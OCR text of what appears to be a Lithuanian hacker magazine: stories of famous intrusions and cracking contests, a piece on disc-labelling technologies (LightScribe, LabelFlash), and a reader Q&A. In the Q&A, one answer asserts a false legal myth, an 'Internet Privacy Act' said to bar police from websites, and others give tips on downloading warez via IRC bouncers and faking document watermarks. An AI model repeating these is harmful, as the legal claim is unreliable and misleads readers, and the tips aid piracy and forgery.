neparašė Hacked by Global Hell. Tiesa, vietoje pasaulinės kie- 
tojo hakerio šlovės Čadas gavo 10 tūkstančių dolerių baudą ir 
apie metus kalėjimo, tačiau tai viso labo smulkmenos. 

„RSA Security inc“ — žymiausi kriptografijos srities specialistai. 
Logiška būtų manyti, jog jų portalas apsaugotas ne prasčiau 
kriptoalgoritmų. Deja, www.rsa.com svetainės sistemų admi- 
nistratoriams dar yra ko išmokti — svetainę defeisino nežinomi 
hakeriai, kas smarkiai pakirto „RSA Security“ reputaciją. 
Pratęsti pasakojimą apie nulaužtas svetaines galima būtų vos 
ne iki begalybės. Vis dėlto aš manau, jog tu ir taip supratai, kad 
bet kuris internete esantis portalas gali būti nulaužtas, kad ir 
koks kietas jis būtų. 


[Tinklai] Pentagonas, NASA... kino filmuose jeigu hakeris suge- 
bėjo nulaužti šių organizacijų tinklus, jis laikomas pačiu šau- 
niausiu. Tačiau ar tikrai šaunuolio verti patys šie tinklai? 

JAV gynybos ministerijos kompiuterių tinklas vienas didžiau- 
sių pasaulyje. Savo kompiuteriams išlaikyti Pentagonas išlei- 
džia apie 1,8 milijardo dolerių per metus. Neseniai gynybos 
ministerijoje buvo įvesta „kovinio pasirengimo kompiuterių ata- 
koms būklės“ skalė, analogiška karinių ir teroristinių grėsmių 
skalėms. Priklausomai nuo skalės būsenos armija pervedama į 
atitinkamą pasirengimo būseną, kas padeda koordinuoti veiks- 
mus iki ypatingos situacijos. 

Po ILoveYou ir Blast virusų epidemijų panašus dalykas sukurtas 
ir kompiuterių saugumo srityje. Tiesą sakant, aš nesuprantu, 
kaip JAV armija gali išgelbėti internetą nuo virusų epidemijų, 
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bet bala nematė. Pentagono 
serveriai maksimaliai apsaugo- 
ti, juose įdiegta naujausia pro- 
graminė įranga, patys svarbiau- 
si serveriai neprijungti prie glo- 
balaus tinklo, taip siekiant iš- 
vengti įsiskverbimo iš išorės. Ke- 
letas tūkstančių profesionalių 
sistemų administratorių seka 
tinklo veikimą. 

Pirmuoju hakeriu, kuris prisipa- 
žino įsilaužęs į Pentagono tin- 
klus, tapo izraelietis Echudas Te- 
nenbaumas, pogrindyje žinomas 
kaip Analyzer. Incidentas įvyko augant situacijos įtampai Persi- 
jos įlankos rajone, todėl JAV vyriausybė buvo tikra, jog tai Irako 
bandymai sutrukdyti karinių pajėgų veiksmus šiame rajone. Ta- 
čiau į tyrimą įtraukus CŽV ir FTB šios tarnybos greitai susekė 
izraelietį hakerį, kuris su Sadamu Huseinu neturėjo visiškai jo- 
kių ryšių, o įsilaužė tiesiog šiaip sau, taip sakant, tyrinėdamas. 
FTB net išleido trumpą dokumentinį filmą apie tai, kaip valstijo- 
se gaudomi hakeriai. Beje, įsilaužėlis nepriėjo prie konfidencia- 
lios informacijos, dėl ko atsipirko tik pusės metų bausme. Kur 
kas toliau nuėjo anglas Haris Makinonas bedarbis sistemų 
administratorius iš Londono. Suradęs gynybos ministerijos tin- 
klo IP adresus (kas profesionalui nesukelia jokio vargo), Maki- 
nonas pasinaudojo saugumo sistemų skylėmis ir kai kuriuose 
kompiuteriuose gavo administratoriaus teises, 0 po to kaip rei- 
kiant pasilinksmino. Jis iš sistemos pašalino 1300 vartotojų 
(sisteminių įrašų), ištrynė daugybę svarbių bylų, nepamiršo kai 
ko perkopijuoti ir sau, šimte kompiuterių sukėlė savo privilegi- 
jas iki root. 

Aptikę Hario veiklos pėdsakus, kariškiai likvidavo visus nesklan- 
dumus bei pradėjo tirti šią bylą. Nustatę, jog tai Ūkanotojo Al- 
biono gyventojas, FTB paskelbė tarptautinę Makinono paiešką. 
Iš viso šiuo tikslu buvo išleista apie milijonas (!!!) dolerių, nors 
hakerio veiksmų sukelti nuostoliai nesiekė šimto tūkstančių. Savo 
įsilaužimą Haris paaiškino tuo, jog norėjo gauti informacijos apie 
ateivių egzistavimą, o Pentagonas, jo manymu, kaip tik ir turėjo 
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surado ką nors vertingo, bet šiam dėdulei gresia iš tiesų ne- 
menka bausmė... 

Dar viena organizacija, kurios pristatinėti nereikia ir kurios kom- 
piuteriai turi būti gerai apsaugoti — tai aerokosmoso agentūra 
NASA. Būtent čia atliekami pirmaujančių technologijų tyrimai ir 
kūrimas, valdomi palydovai, kosminiai laivai ir šatlai. Priėjimas 
prie tokio tipo informacijos griežtai įslaptintas, tačiau dvidešimt- 
metis amerikietis Raimondas Toričelis lengvu kelių neieškojo 

jo įsilaužimo tikslų tapo būtent NASA. Viename iš vyriausybinių 
kompiuterių Raimondas įdiegė... IRC serverį, kuris turėjo būti 
skirtas pokalbiams su savo draugais iš hakerių grupes Conflict, 
o kitame serveryje buvo įdiegtas sniferis, kuris periminėjo vals- 
tybinio San Chosė universiteto vartotojų slaptažodžius. Hakeris 
buvo areštuotas savo namuose, tiesiog prie kompiuterio, kuria- 
me buvo aptikti visi jo kaltės įrodymai. 250 tūkstančių dolerių 
bauda ir laisvės atėmimas štai kokia kaina už IRC serverio 
įdiegimą vyriausybės kompiuteryje. 

Tiesą sakant, hakeriai nepridarė nieko itin ypatingo. Ko gero, jie 
to ir negalėjo padaryti. Paleisti branduolines kovines raketas 
arba išsiųsti palydovą į naują orbitą įsilaužėliai kol kas neturi 
galimybės. Kol kas... 

Tu tikriausiai girdėjai apie langinių išeities tekstų vagystę. Hake- 
riai juos gavo į kompanijos korporatyvinį tinklą paleidę kirminą 
Oaz, kuris periminėjo visus slaptažodžius. Tikriausiai koks nors 
darbuotojas gavo užkrėstą 
laišką ir atidarė prie laiško 
prisegtą bylą su užkratu, O 
antiviruso jo kompiuteryje 
nebuvo. Perėmęs slapta- 
žodį piktavalis gavo priėji- 
mą prie sistemos ir iš vie- 
no serverio parsisiuntė 
Windows NT 4 bei Win- 
dows 2000 operacinių sis- 
temų išeities tekstus. Vi- 
sa aukščiau aprašyta isto- 
rija nėra oficialūs faktai, O 
tik internete sklandantys 
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gandai, jokiu būdu nepretenduojantys į objektyvumą. Nepai- 
sant to, operacinių sistemų išeities tekstus iš tiesų buvo galima 
rasti apsikeitimo bylomis tinkluose. Tiesa, po to nesekė jokia 
virusų epidemija ar langinėms skirtų eksploitų banga — pavo- 
jus pasirodė besąs Kur kas menkesnis, nei numatė ekspertai. 
Bet svarbiausia čia šiek tiek kitas da- 
lykas net ir tokia korporacija kaip 
„Microsoft“ negali saugiai išlaikyti vi- 
sų savo paslapčių. Ką jau kalbėti apie 
kitas kompanijas? 


[Kriptografija] Firma „Certicom“ 
kriptografijos pasaulyje žinoma savo 
ECC algoritmu. Šis algoritmas už po- 
puliarųji RSA kur kas ekonomiškes- 
nis Ir saugesnis: 164 bitų ECC ekvi- 
valentiškas 1024 bitų RSA. „Certi- 
com“ sutiko išmokėti 10 tūkstančių 
dolerių prizą tam, kas sugebės de- 
šifruoti algoritmą. Prancūzų laisvos 
programinės įrangos entuziastai pa- 
naudojo 597 kompiuterius ir po pu- 
sės metų darbo sugebėjo nulaužti 
108 bitų ilgio ECC. Už tai jie gavo tik 
2000 dolerių, o likę pinigai iškeliaus 
į laisvos PĮ plėtojimo fondą. 

Šis nulaužimas pasirodė labai svar- 
bus — jis parodė, kad net 1024 bitų 
raktas jau nesuteikia šimtaprocenti- 
nės apsaugos, 0 nauji algoritmai nėra išeitis iš padėties. 

Dar vieną plačiai nuskambėjusį haką atliko švedų kriptografai, 
dešifravę Saimono Saino algoritmą. Sainas — Kembridžo uni- 
versiteto fizikos profesorius, „Kodų knygos“ — kriptografijos va- 
dovėlio — autorius. Jis ir jo pagalbininkai per metus sukūrė 10 
skirtingo sudėtingumo kodų, po ko savo algoritmus laikė prak- 
tiškai nepažeidžiamais. Saimonas net pareiškė apdovanosiąs 
tą, kuris nulauš visus 10 kodų 15 tūkstančių dolerių prizu. Fre- 
derikas Almgrenas šiais algoritmais susidomėjo todėl, kad jie 
naudojami internetinių bankų ir parduotuvių elektroninėse sis- 
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temose. Frederikas nulaužė visus šifrus, tuo pačiu pademonst- 
ruodamas pasauliui pasauliniame voratinklyje naudojamos krip- 
tografijos silpnumą. 

Šiandien pačiu patikimiausiu algoritmu laikomas JAV šifravimo 
standartas 


Rijndael. Belgų kūrinio, kuris laimėjo AES kon- 
kurse, dar niekas nespėjo nu- 
laužti. Kol kas nespėjo. Iš tiesų 
neįveikiamą algoritmą galima su- 
kurti tik panaudojant kvantinę 
kriptografiją, kuri šiandien dar per 
mažai ištirta. 


[Konkursai] Tu tikriausiai girdė- 
jai arba skaitei apie žaidimų kon- 
solės Xbox nulaužimą, į kurią gud- 
ručiai sugalvojo įdiegti Linux. Ta- 
čiau ar tu žinojai, kad hakeriai tai 
darė ne dėl įdomumo, o už labai 
gerą atlygį 250 000 dolerių. 
2002 metais anoniminis rėmė- 
jas www.sourceforge.com svetai- 
nėje įdėjo skelbimą apie tai, jog 
sutinka šią sumą išmokėti tam, 
kas žaidimų konsolę pritaikys Li- 
nuxui. Kaip paaiškėjo, šis rėmė- 
jas buvo Maiklas Robertsonas 
kompanijos „Lindows“, pagarsė- 
jusios savo bandymais sukryžminti 
Linux ir Windows, generalinis di- 
rektorius. Kaip aiškina jis pats, tai darė tam, kad žmonėms su- 
teiktų pasirinkimą — atseit, monopolijai demokratiškoje visuo- 
menėje ne vieta. 

Hakeriškoje aplinkoje gana populiarus ir autoritetingas yra kon- 
kursas openhack.com. Šis kompanijos „eWeek Labs“ projektas 
sukurtas tam, kad išaiškintų pažeidžiamumus populiariuose pro- 
graminiuose produktuose bei padėtų elektroninės komercijos 
srityje dirbančioms įmonėms. Pirmojo konkurso metu WwWw.open- 
hack.com svetainėje buvo sukurta elektroninė parduotuvė su 
pašto serveriu ir duomenų baze. Fiziškai serveris, kuriame veikė 
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svetainė, buvo Toronte, firmoje „Guardent“, kuri specializuojasi 
interneto apsaugų kūrime. Pageidaujantiesiems buvo siūloma 
Jį nulaužti. Openhack apėmė keletą potinklių, kuriuose buvo 
naudojamos pačios įvairiausios OS: Solaris, Linux, OpenBSD, 
Windows NT. Konfigūruoti serverio apsaugą padėjo „Microsoft“ 
ir „Sun“ saugumo specialistai, o vietoje ugniasienės veikė apa- 
ratinis Axent Technologies daikčiukas. Už web serverio pažei- 
dimą įsilaužėlis gaudavo 500 dolerių, už pašto serverio sunai- 
kinimą 1500, o už priėjimo prie duomenų bazės gavimą 
dvi su puse tonos žaliųjų amerikietiškų prezidentų. Laimėtoju 
tapo IT apsaugos konsultantas Luisas Mora. Pakeliui iki duo- 
menų bazės hakeris surado 3 elektroninės parduotuvės Mini- 
Vend skriptų pažeidžiamumus ir vieną Solaris sistemos pažei- 
džiamumą. 

Trečiame Openhack konkurse pagrindinio prizo suma jau siekė 
50000 dolerių. Tai labai suprantama — hakeriams reikėjo nu- 
laužti PitBull, kompanijos Argus Systems Group Kompiuterinės 
apsaugos programą. PitBull naujas žodis IT saugume, tai 
sistema, veikianti su OS branduolio lygyje, kontroliuojanti priėji- 
mą prie FS ir procesų. Visas kūrimas vyko uždarai, todėl niekas 
tiksliai nežinojo, kokia gi ta apsauga. PitBull tapo vienintele kliū- 
timi, kurios hakeriams nepavyko nulaužti DefCon konkurse. 
OpenHack 3 konkurse ji ir vėl pasirodė neįveikiama. Beje, tam 
be PĮ neįveikiamumo galima surasti ir kitą paaiškinimą: hake- 
riai superprofesionalai vargu ar viešai pasirodys panašiuose kon- 
kursuose net ir už 50 tūkstančių dolerių, o paprastiems entu- 
ziastams tiesiog neužtenka kvalifikacijos. 

Dar vieną prizelį kompiuterių specialistams pamėtėjo „Mozilla 
Foundation“ už 5 surastas klaidas savo ugninėje lapėje ji 
išmokės po 2500 dolerių. Penki žmonės jau gavo savo pinigus, 
galbūt čia pasipelnyti galėtum ir tu programa „pinigai už 5 
klaidas“ vis dar galioja. 

Kriptoanalitikai gali gauti automobilį Ferrari 360. Be abejo, jis 
duodamas ne šiaip sau, o už kompanijos „MegaNet“ (be abejo, 
tai ne kaunietiškasis meganetas ;) red.past.) šifravimo sis- 
temos nulaužimą. Iš www. meganet.com svetainės parsisiųsk 
bylą ferrari.vme, kuri užima tik 147 KB, ir iš jos išgauk doku- 
mentą. Jeigu tau tai pavyks gausi automobilį. Tiesa, trans- 
portiravimo išlaidas apmokėti teks tau pačiam, tačiau aš ma- 
nau, jog tai neužtemdys pergalės džiaugsmo. 


Pati saugiausia 0S — OpenBSD 


BT- Geras.com 


Owned Outlaw Group by Pharoeste e 
Wolfblack 


Owned by OutLaw Group 


Microsoft.com defeiso veidrodis 


Jeigu tu mėgai mokykloje spręsti matematines užduotis, Išban 
dyk save Bodacion Technologies konkurse. Čia kiekvienas dalyvis 
gauna seką iš 999 skaičių, kurie sugeneruoti pagal specialų al 
goritmą. Užduotis surasti tūkstantąjį skaičių. Tavo apdovanoji- 
mas bus net 10 tūkstančių dolerių, tačiau iš karto perspėju — 
per pastaruosius metus taip niekas ir nesuvokė, pagal koki algo 
ritmą išdėstyti šie skaičiai... 
Ne taip senai kompanija SDMI, reklamuodama savo muzikinių 
įrašų apsaugos nuo kopijavimo priemones, kiekvienam nulau 
žusiajam jos algoritmus pažadėjo po 10000 dolerių. Ji tai pa- 
darė iš tiesų be reikalo, kadangi amerikiečių tyrinėtojų grupė 
vos per keletą dienų nuo konkurso pradžios Iš apsaugos nepa- 
liko nė pėdsakų. SDMI suprato, kad po to pardavinėti savo pro- 
dukciją bus šiek tiek problematiška, todėl pareiškė, kad nulau- 
žimas negalimas nesumažinus skambėjimo kokybės, 0 jeigu tai 
kam nors ir pavyko, tai tik atsitiktinai. Savo pinigėlių hakeriai 
taip ir negavo, nors geriausias SDMI algoritmų silpnumo patvir- 
tinimas yra kiekviename turguje siūloma piratinių diskų gausa. 


[Išvados] Šiame straipsnyje norėjau papasakoti apie programinius 
produktus, kurių hakeriai nesugebėjo nulaužti. Bet, kaip paaiškėjo, 
nulaužta buvo viskas: nuo smulkių įrankių iki operacinių sistemų. Vie- 
nintelė apsauga, kurios iš tiesų neimanoma nulaužti — tai demonst- 
racinės versijos, Kur vartotojas pilnavertišką programą gauna tik po to, 
kai ją nusiperka. Tokios programos pavyzdžiu galėtų 
būti Xspider, kurios septintai versijai nėra kreko. 
Apsaugų nuo kompaktinių diskų kopijavimo rin- 
koje lyderiauja StarForce visi kiti nulaužiami 
namų sąlygomis per dešimt minučių. O StarFor- 
ce iki šiol laikoma nepažeidžiama, nors kiekvie- 
nas mūsų skaitytojas žino, kad norint nukopi 
juoti apsaugotame diske saugomus duomenis, 
pakanka tiesių rankų ir programos Alcohol 
12090. O pats saugiausias ryšio ir duomenų per- 
davimo protokolas — OpenSSH. Nuo jo neatsi- 
lieka ir uždaras kompanijos „Datafellows“ ko- 
mercinis produktas ssh2, kuris yra laikomas vie- 
nu iš saugiausių. 

Tikiuosi, perskaitęs šį straipsnį tu supratai, JOg 
absoliuti apsauga tai tik mokslinė fantasti- 
ka. Iš tiesų, nulaužti galima viską. Tai tik laiko ir 
investicijų klausimas. Kaip rodo praktika, šios 
investicijos debesų nesiekia. 


FERRUM 
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Hi-tech'inis diskų rašymas 
VIENI SAVO DISKUS MARKIRUOJA SPECIA- 
LIAIS RASIKLIAIS, KITI ETIKETES SPAUSDINA 
SPAUSDINTUVU, O PO TO LIPDO JAS ANT 
DISKO, TRETIEJI SPAUSDINA TIESIOG ANT 
PACIŲ DISKŲ. O KETVIRTIEJI TAM PANAUDOJA 
PACIUS DISKŲ RASYMO ĮRENGINIUS... 


SOFTWARE 


IMPLANT 


Vaizdo uždėjimo ant disko technologija 
[Apie ką čia aš?] Šiame straipsnyje papasakosiu bū- 
tent apie diskų markiravimo lazeriu technologijas. Su- 
tik, kad su markeriu nenupieši jokio gražaus vaizdelio, o 
lazeriu galima padaryti didelės skiriamosios gebos pa- 
veiksliuką. Lipdukai diskams iš viso pavojingi, nes jeigu 
juos užklijuosi kreivai ir suglamžytai, tai diskas gali su- 
gesti pačiame įrenginyje dėl jo paviršiaus nelygumų. O 
spausdintuvų, kurie gebėtų spausdinti ant diskų, ne tiek 
jau ir daug, tačiau jų galima rasti tarp „Epson“ ir „Ca- 
non“ gaminamų modelių. 

Lazerinės vaizdo uždėjimo ant disko technologijos ge- 
ros tuo, jog nereikalauja papildomų išlaidų — tau pa- 
kanka turėti šią technologiją palaikantį įrenginį. Tuomet 
nereikės pirkti nei markerių, nei lipdukų, nei kartridžų 
su spalvomis. 


HACK 


SCENA 


[DiskTO02] DiskT2 technologija jau egzistuoja nuo 
2002 metų. Ją tada pristatė „Yamaha“, išleidusi vie- 
nintelį pasaulyje šiai technologijai pritaikytą įrenginį 

CRW-F1. Tatuiruotė būdavo nupiešiama ant darbinio 
disko paviršiaus. Po to, kai į diską būdavo įrašomi duo- 
menys, jis finalizuodavosi, o likusioje laisvoje vietoje buvo 
suformuojamas paveiksliukas arba tekstas. Pats vaiz- 
delis buvo formuojamas diskų rašymo programoje Nero 
Burning ROM. Tatuiruotė galėjo būti nupiešta tik ant 
CD-R diskų su tamsiu paviršiumi. „Yamaha“ oficialiai 
suderinamais diskais paskelbė tik DataLifePlus serijos 
Verbatim su Super AZO sluoksniu, taip pat MusicLifeP- 
lus seriją su Metal AZO sluoksniu bei TDK Reflex Ultra ir 
Reflex Ultra Metallic Disc diskus. Derėtų paminėti, kad 
24 šrifto dydžio teksto užrašymui ant disko būdavo su- 
naudojama apie 10-15 minučių, kas nėra taip jau grei- 
tai. Buvo išleisti keli įrenginio variantai: E-IDE, SCSI-3, 
USB 2.0 ir FireWire. Pas mus parduotuvių vitrinose su- 
rasti CRW-F1 buvo sudėtinga, tačiau jūsų nuolankus 


UNIXOID 


CODING 


UNITS 


Žymusis „Yamaha“ įrenginys CRW-F1 


tarnas vis dėlto spėjo jį įsigyti, dėl ko iki šiol nesigaili :). Neilgai 
trukus „Yamaha“ pranešė, kad visiškai pereina prie DVD tech- 
nologijos. Ir apie ją nebuvo nieko girdėti iki pat antrosios 2005 
metų pusės. Tačiau apie tai aš papasakosiu šiek tiek vėliau. 


[LightScribe] 2005 metų pradžioje internete pradėjo sklandyti 
gandai, kad kompanija HP naująją technologiją nori pristatyti 
LightScribe pavadinimu (pilnas pavadinimas LightScribe Di- 
rect Disc Labeling), ką pažodžiui galima išversti kaip „šviesora- 
šis“. Jos esmė — galimybė uždėti vaizdą ant nedarbinio diskų 
paviršiaus (CD arba DVD). Tam kompiuteryje sukuriame marki- 
ruotę ir ją uždedam gaunasi gražiai ir dailiai :). Tik įrašius 
duomenis reikės apversti diską. Derėtų pastebėti, kad šiuo metu 
technologija išgauna iki 256 pilkos spalvos atspalvių, todėl apie 
spalvotą vaizdą kalba kol kas nekalbama. 


Norint pasinaudoti nauja technologija, reikia turėti: 

— DVD įrenginį su LightScribe technologija 

— LightScribe diską 

— LightScribe palaikančią programinę įrangą. 

Šiuo metu išleista ne tiek jau daug rašančių DVD įrenginių, 
kuriuose veiktų naujoji technologija, o tie, kurie išleisti, diskų 
rašymo greičiu smarkiai atsilieka nuo savo brolių be šios tech- 
nologijos. Geru pavyzdžiu galėtų būti HP dvd640i. Iš gamintojų 
derėtų paminėti tokias firmas, 
kaip „Beno“, „LaCie“, „Philips“ ir, 
savaime suprantama, HP 
Įrašomų diskų gamintojų pasirin- 
kimas taip pat nedidelis, kadangi 
HP būtinai reikalauja testavimo 
ir po to einančio licencijavimo. 
Tuo pačiu HP nori pasiekti pilną 
„Yamaha“ ir NEC technologija: LabelFlash diskų ir įrenginių su LightScribe 


logotipu suderinamumą. 
Pagrindinis diskų gamin- 
tojas šiuo metu, be jo- 
kios abejonės, yra Ver- 
batim. Jau dabar par- 
Isoribe“ Print duodami CD-R ir 
DVD+R diskai su nau- 
: josios technologijos pa- 
irenginio sulaikymu. 
tesios Etiketę galima sukurti su 
a. hp640.shtmi 2 Š ž 

labai populiaria diskų ra- 
šymo programa NERO 
Burning ROM arba su 
specializuota programa, kuri pateikiama su daugeliu retail versi- 
jos įrenginių — SureThing CD/DVD Labeler. Apie naujosios funk- 
cijos galimybę savo programiniuose produktuose taip pat prane- 
šė tokios kompanijos, kaip Cyberlink, InterVideo ir Sonic. 


htip://h10( 
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io su LightScr 


[Technologija iš vidaus] Jeigu tu turi DVD rašiklį, tai derėtų 
pastebėti, kad atnaujinęs įrenginio mikroprograma tu negalėsi 
pasinaudoti naująja technoligija. Su LightScribe suderinamų įren- 
ginių vidinė sandara šiek tiek kitokia. Juose įmontuota speciali 
schema, kuri turi LightScribe kaupiklio atpažinimo daviklį. Taip 
pat schema atsako už tikslų fokusavimą į reikiamą takelį ir dis- 
ko centravimą. Iš viso yra 40000 takelių, ir jie vienas nuo kito 
išsidėstę 10 mikrometrų atstumu. 

Dabar vertėtų papasakoti apie laiką, kuris sunaudojamas vaiz- 
deliui nupiešti. Prieš pradėdama darbą programa tavęs užklau- 
sia pageidaujamos vaizdo kokybės, čia tu gali pasirinkti vieną iš 
šių režimų: 

* Best 4 - 36 min. 

* Normal 3 - 28 min. 

* Draft 2 - 20 min. 
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Pasirenkame spausdinimo kokybe ir važiuojam 


Kuo geresnę kokybę pasirinksi, tuo kontrastingesnis bus pa- 
veiksliukas. Artimiausiu metu HP planuoja padidinti etikečių kū- 
rimo laiką, kadangi laukti 40 minučių vien tam, kad gautum 
kokybišką vaizdą labai daug. 


[LabelFlash] Ir vėl „Yamaha“. Dabar jau kartu su „Nec“ jie su- 
kūrė patobulintą DiskTO02 versiją, kuri savyje apjungia iš karto 
keletą privalumų: spausdinimą tiek ant darbinio paviršiaus 
(DiskT(02 technologija), tiek ir ant išorinės pusės (LightScribe 
alternatyva). Bet ir tai dar ne viskas. Atsverdama LightScribe, 
naujoji LabelFlash technologija leidžia sukurti aukštos kokybės 
paveikslėlius su 256 galimais atspalvių variantais. O tokios eti- 
ketės sukūrimo greitis — vos 5 (!) minutės! Tai atrodo nerealiai! 
Tačiau šią technologiją aprėpiantys įrenginiai jau turėtų būti pre- 
kyboje. Pirmieji DVD-RW įrenginiai, pritaikyti LabelFlash, bus 
Nec ND-4551A, ND-3551A bei ND-7751A, skirtas montavi- 
mui į nešiojamuosius kompiuterius. Norint vaizdą uždėti ant 
nedarbinio disko paviršiaus, pakaks disko, Kuris turi spausdina- 
mą paviršių (printable diskai). 


Kaip matome, viskas prasidėjo dar 
2002 metais, bet tada su „Yamaha“ 
niekas negalėjo konkuruoti. O dabar 
HP įgyvendino labai gerą idėja. „Yama- 
ha“ neliko nuošaly ir pasiūlė DiskT(O02 
technologijos tęsinį. Dabar konkuren- 
cijos sąlygomis tokios technologijos, 
kaip LightScribe ir LabelFlash, plėto- 
sis daug sparčiau. Visai įmanoma, kad 
greitai pasirodys panašios kitų firmų 
technologijos su kokiais nors savais Iš- 
skirtiniais bruožais. O mums, vartoto- 
jams, belieka tik stebėti paskutines 
šios srities tendencijas ir išsirinkti įren- 
ginį su geriausia technologija. Juo la- 
biau kad įrenginiai, pritaikyti naujoms 
technologijoms, kainuoja maždaug 
10-1596 brangiau už savo analogus 
be vaizdo uždėjimo ant disko techno- 
logijos. 


Verbatim CD-R diskas, 
kunam tinka naujoji technologija 
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Šie logotipai parodo, kad 
įrenginys dirba su LightScribe 
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(0) Ar aš galiu uždrausti priėjimą prie savo web svetainės 
teisėsaugininkams ir kitiems nepageidaujamiems sve- 
čiams? 


Derėtų pastebėti, jog 9096 pasaulio šalių juridinė ba- 

zė interneto atžvilgiu toli nuo tobulybės. Vienareikš- 

miškai sakyti, jog mano atsakymas suveiks visame pa- 

saulyje, bus didelė neteisybė. Pabandykime apsistoti 
ties Amerika, kuri atitinkamą bazę bandė paruošti anks- 
čiau už kitus — dar tolimais 1995 metais; ši šalis taip pat 
aktyviai kovoja su interneto teisių pažeidėjais. Čia galima 
pasinaudoti The Internet Privacy Act, kurį pasirašė oralinių 
malonumų mėgėjas Bilas Klintonas. Šis dokumentas, ku- 
rio numeris 431.322.12, vyriausybės (taip pat ir policijos 
bei specialiųjų tarnybų) darbuotojams neleidžia lankyti 
tavo resurso jeigu tu to nepageidauji. Tai veikia amerikie- 
tiškujų civilinių įstatymų principu, kurie tvirtina, jog polici- 
ninkas negali meluoti. Net dirbdamas slaptai (už priedan- 
gos), toks darbuotojas turi atsakyti, kad jis iš policijos, 
jeigu įtariamasis tiesiogiai apie tai paklaus. Sumelavęs 
pareigūnas negalės gautų duomenų panaudoti teismo pro- 
cese. Remiantis šiuo aktu svetainės disclaimer'yje, gali- 
ma manyti, jog resurse surasta informacija negalės būti 
panaudota galimame tolimesniame tyrime. Be abejo, re- 
alybė gali būti kita, ir net toje pačioje Amerikoje galimas 
toks atvejis, kad kas nors iš svetainės lankytojų (tiesiogiai 
nesusijęs su teisėsauga) sutiks liudyti bei papasakos apie 
svetainėje vykstančius negerus dalykus. Apie likusias šalis 
nėra ko nė šnekėti: labai mažai kas savo šalyje sugebės 
pasinaudoti Klintono pasirašyto akto veiksmingumu. Disc- 
laimer'ių pavyzdžių galima paieškoti warezo svetainėse, 
. pavyzdžiui, isohunt.com arba packetnews.com. 


BŪK KONKRETUS IR UŽDAVINĖK 
KONKREČIUS KLAUSIMUS! PRIEŠ 
SIŲSDAMAS SAVO PROBLEMĄ | 
HACK-FAO, STENKIS JĄ KUO IŠSA- 
MIAU APRAŠYTI. TIK TUOMET Aš 
GALĖSIU IŠ TIESŲ TAU PADĖTI, 
ATSAKYTI BEI! PARODYTI GALIMAS 
KLAIDAS. VENK BENDRINIŲ KLAU- 
SIMŲ, PANAŠIŲ | „KAIP NULAUŽTI 
INTERNETĄ?“ — TU TIK APKRAUSI 
SAVO IR MANO PAŠTO DĖŽUTES. IŠ 
MANĘS GRĘŽTI KO NORS UŽ DYKĄ 
(INTERNETO, SHELLŲ IR PANAŠIAI) 
NEVERTA, NES AŠ PATS GYVENU Iš 
HUMANITARINĖS PAGALBOS! 


(0) Kaip kovoti su spamu reikalaujant siuntėjo patvirtinimo 
ir taip atkirsti spamo robotus? Ar tai efektyvu? 


Patvirtinimas (verification) gali būti atliekamas taip: tu 

išsiunti elektroninį laišką, jis užstringa gavėjo serveryje, 

iš kur ateina atsakymas su prašymu jį patvirtinti. Laiške 

yra nuoroda, kuria tau reikia nueiti ir įvesti paveikslėlyje 
pateiktą skaičių/žodį. Sistema veikia nepriekaištingai, čia 
pavyzdžiais galėtų būti rusų gamybos WinAntiSpam ir vaka- 
rietiškas Spaminterceptor. Sistema labai nelanksti ir dau- 
gelis teisėtų laiškų siuntėjų tiesiog tingi dar eiti kokiais nors 
adresais ir kažką patvirtinti. Geras analogas būtų jeigu |ei- 
nant į banką visi būtų išrengiami beveik nuogai ir patikrina- 
mi, ar neturi paslėpę ginklo. Tiesa, tiek prieš plėšikus, tiek 
prieš spamą abi sistemos veikia labai sėkmingai, tačiau su 
teisėtais lankytojais ir siuntėjais jos gali būti pernelyg griež- 
tos. Kartais vartotojai siųsdami laišką tiesiog neturi priėji- 
mo prie interneto, korporatyvinis VPN neišleidžia į pasaulinį 
voratinklį arba iš viso laiškas yra siunčiamas per nuo inter- 
neto izoliuotą priešistorinį tinklą, pavyzdžiui, X.25 arba FTN. 


Kaip per BNC sugrėbti warezą? 


serveryje ir palaukti, kol jie visko prisisiųs, 0 po to kom- 

fortabiliai visas gėrybes parsisiųsti per FTP Išeina taip, 

kad visi DCC srautai iš pradžių išeina į serverį, kuriame 
įdiegtas bounceris, o po to jau nukreipiami į vartotojo kom- 
piuterį. Taip labai naudingai išlošiama siuntimo greičio at- 
žvilgiu, kadangi didelį greitį turintis serveris viską parvilks 
kur kas greičiau, nei tavo 56K modemas. Pasitaiko ir tokių 
atvejų, kad warezas per IRC iš vieno interneto segmento į 
kitą tiesiog nesisiunčia — botai kartais įdiegiami tokiuose 
užkampiuose, kad be pusės litro iš ten neparsisiųsi nė bai- 
to. Pabandžius siųstis iš įvairių BNC, visada galima surasti 
bent vieną veikiantį. Tai jau kitas klausimas, tačiau primin- 
sių, jog programos įdiegimui reikalingas veikiantis shellas, 
kuriame bus galima paleisti foninį (background) procesą ir 
kur visoms siunčiamoms gėrybėms bus pakankamai vietos. 
Aš neseku paskutinių bnc kūrimo naujienų, tačiau visada 
veikiantis variantas buvo PsyBNC (www.psychoid.net) — gali 
siųstis ką nori be jokių sunkumų. 


R Geriausia būtų BNC paleisti draugų IRC-warezininkų 


Kontroliuoju keletą sistemų, tačiau jau pavargau tik- 
rinti kiekvienos jų darbingumą. Ar galima kaip nors kon- 
soliduoti visų jų logus? 


Vieningo kelių sistemų administravimo klausimas su- 
formuotas išties neaiškiai. Šiuo atveju teisingiausias 
sprendimas galėtų būti tavo SSH klientui sukurti skrip- 
tai, kurie gali veikti tiek lokaliai, tiek ir nuotoliniu būdu. 
Tuomet viena komanda bus išsiųsta iš karto į keletą valdo- 
mų mašinų. Vis dėlto tai tik universalus atsakymas, kuris, 
ko gero, neišgelbės nuo turimų problemų ir ligų :). Tiksliau 
galima būtų atsakyti į antrąjį klausimą apie logų apjungi- 
mą. Visas savo mašinas aš tikrinu surinkdamas logus per 
LogMeister (www.logmeister.com). Jis moka surinkti infor- 
macija iš pačių įvairiausių sistemų, apdoroti informaciją ir 
rezultatus pateikti kaip paprastą tekstą, csv, xm! (labą die- 
ną, RSS). Jeigu po ranka išskirtinai vien tik Windows siste- 
mos, tuomet į pagalbą ateis tam pritaikytas EventMeister 
sprendimas. 
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dens ženklus ir kitus gudrius dalykėlius? 


Iš pradžių tau reikia atsakyti į tokį klausima: iš kur bus 

gauti vandens ženklų pavyzdžiai? Jeigu juos turi, tuo- 

met galimi du klausimo sprendimo būdai: pasinaudo- 
ti profesionalia dokumentų kūrimo programine įranga arba 
mėgėjiškomis realizacijomis. Pirmąjį variantą galėtų atsto- 
vauti programa „Cerber“ (www.securesoft.ru/cerber.html). 
